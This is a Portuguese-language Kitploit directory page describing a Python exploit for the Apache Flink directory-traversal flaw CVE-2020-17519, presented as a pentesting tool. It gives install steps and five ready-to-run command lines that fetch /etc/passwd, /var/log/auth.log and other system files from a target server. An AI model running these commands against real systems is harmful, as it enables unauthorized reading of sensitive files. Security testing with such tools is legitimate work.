Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-17519 — Exploit de travessia de diretório baseado em Python para CVE-2020-17519 (Apache Flink) com multi-threading, suporte a proxy e profundidade configurável para recuperar arquivos de log de alvos vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/gazettel/cve-2020-17519
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubgazettel/cve-2020-17519

CVE-2020-17519

Exploit de travessia de diretório baseado em Python para CVE-2020-17519 (Apache Flink) com multi-threading, suporte a proxy e profundidade configurável para recuperar arquivos de log de alvos vulneráveis.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-17519

Ferramenta de Travessia de Logs

Uma ferramenta Python que utiliza uma técnica de travessia de diretórios para requisitar arquivos de log de uma URL alvo. Exibe progresso em tempo real, suporta configuração de proxy e, opcionalmente, salva respostas válidas.


Funcionalidades

  • Travessia de Diretórios com Profundidade Configurável
    Utiliza uma profundidade configurável para a travessia de diretórios.
  • Caminho de Arquivo Único ou Múltiplos Caminhos
    Suporta a requisição de um único caminho de arquivo ou múltiplos caminhos a partir de um arquivo.
  • Suporte a Multithreading
    Executa requisições concorrentemente utilizando múltiplas threads.
  • Suporte a Proxy
    Permite configurar um proxy para as requisições.
  • Salvar Respostas Válidas
    Salva respostas válidas em arquivos individuais.
  • Exibição de Progresso em Tempo Real
    Mostra o progresso em tempo real utilizando pwntools.

Requisitos

  • Python 3.6 ou superior
  • Pacotes Python: requests e pwntools (pwn)
  • Bibliotecas padrão: argparse, os, concurrent.futures, threading

Instalação

  1. Clone o repositório
    root@kitploit:~
    git clone https://github.com/GazettEl/CVE-2020-17519.git
    pip install requests pwntools
    

Uso

A ferramenta pode ser executada a partir da linha de comando com várias opções. Abaixo estão alguns exemplos:

Exemplo 1: Requisitar um Único Caminho de Arquivo

root@kitploit:~
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save

Exemplo 2: Requisitar Múltiplos Caminhos de Arquivo a partir de uma Lista

root@kitploit:~
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none

Exemplo 3: Executar com Proxy Desabilitado

root@kitploit:~
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none

Exemplo 4: Usar uma Lista de Arquivos e Salvar Respostas Válidas

root@kitploit:~
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save

Exemplo 5: Requisitar um Único Arquivo com Profundidade Aumentada

root@kitploit:~
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1

Para mais detalhes, consulte o código fonte e os comentários inline.

Baixar ferramenta